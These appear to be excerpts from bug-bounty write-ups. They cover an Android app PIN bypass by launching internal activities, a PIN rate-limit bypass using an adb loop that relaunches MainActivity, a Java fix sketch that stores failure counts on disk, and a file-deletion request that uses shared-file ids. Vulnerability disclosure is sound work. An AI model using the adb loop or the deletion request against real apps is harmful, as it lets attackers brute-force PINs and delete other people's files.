Hitting the main activity multiple times allows viewing any activity inside the app without even entering the mobile PIN.
The application has mobile PIN security. Without entering the PIN you can't get into the app.
But by calling internal activities like settings.activity and notifications.activity with…
Application pin rate limiting bypass
The bug is in a private program.
There is a feature to lock the mobile app with a PIN, with only 3 attempts allowed. If a wrong PIN is entered on all of them, the app logs out.
But there is a misconfiguration in this feature. If you enter the PIN 2 times, close the app and open it again, you get another 3 attempts. So the rate limiting is bypassed by closing the app and calling the main activity again.
You can launch the main activity as many times as you want with adb:
while true;do adb shell am start -a android.intent.action.VIEW -n com.redacted/com.redacted.MainActivity;sleep 4;done
During the sleep time you can enter the PIN 2 times; then the main activity is called again, so you can enter the PIN again.
Impact: mobile auth PIN rate limiting bypassed
No thanks for reading ..!
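On the fix side, the attempt counter has to survive an activity or process restart. The sketch below is an added example, not code from the reported app: the class name PinGate, the preference file and key names, and the hash parameters are all assumptions. It charges each attempt to persistent storage before the PIN is checked.

```java
import android.content.Context;
import android.content.SharedPreferences;
import java.security.MessageDigest;

/** Hypothetical PIN gate: the failure counter lives on disk, not in activity state. */
public final class PinGate {
    private static final String PREFS = "pin_gate";            // assumed file name
    private static final String KEY_FAILS = "failed_attempts"; // assumed key name
    private static final int MAX_ATTEMPTS = 3;                 // limit from the write-up

    public enum Result { OK, WRONG_PIN, LOCKED_OUT }

    private final SharedPreferences prefs;

    public PinGate(Context ctx) {
        prefs = ctx.getApplicationContext()
                   .getSharedPreferences(PREFS, Context.MODE_PRIVATE);
    }

    /** Call from every PIN prompt; relaunching MainActivity does not reset the count. */
    public synchronized Result verify(byte[] enteredHash, byte[] storedHash) {
        int fails = prefs.getInt(KEY_FAILS, 0);
        if (fails >= MAX_ATTEMPTS) {
            return Result.LOCKED_OUT; // still locked after a restart
        }
        // Charge the attempt first and commit() synchronously, so closing or
        // relaunching the app in the middle of a check cannot refund it.
        prefs.edit().putInt(KEY_FAILS, fails + 1).commit();

        if (MessageDigest.isEqual(enteredHash, storedHash)) {
            prefs.edit().putInt(KEY_FAILS, 0).commit(); // success clears the count
            return Result.OK;
        }
        return (fails + 1 >= MAX_ATTEMPTS) ? Result.LOCKED_OUT : Result.WRONG_PIN;
    }

    /** Call only after the user has logged in again with full credentials. */
    public synchronized void resetAfterFullLogin() {
        prefs.edit().putInt(KEY_FAILS, 0).commit();
    }
}
```

On LOCKED_OUT the caller performs the app's existing logout. Clearing app data also clears this counter, so the sketch assumes the session is wiped with it; counting attempts server-side removes that assumption.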
An attacker is able to delete any file through a vulnerable endpoint ..!
POST /u/4/deleteShareable?appVersion=20190926_020020 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: application/json, text/plain, */*
Cookie: RAP_XSRF_TOKEN=ACQ5uE-fZxoHyJIMJ6I9fWifDGZzjTeHCw:1569756166600; gh_7510439=;
Guessing the id here is not possible. But if the victim has shared his file, the id will be visible in the URL path.
September 29, 2019 : Reported
Oct 1, 2019 : Triaged
Oct 8, 2019 : bounty awarded 5k$
No thanks for reading the report :-